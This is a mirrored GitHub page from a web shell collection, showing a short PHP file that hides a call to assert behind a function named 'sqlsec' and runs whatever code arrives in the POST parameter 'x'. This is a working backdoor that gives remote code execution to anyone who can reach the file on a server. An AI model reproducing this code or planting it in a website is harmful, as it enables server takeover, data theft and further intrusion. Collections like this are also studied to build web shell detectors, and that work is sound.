1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Files
webshell/php/2020.08.20.05.php

8 lines
87 B
PHP

<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>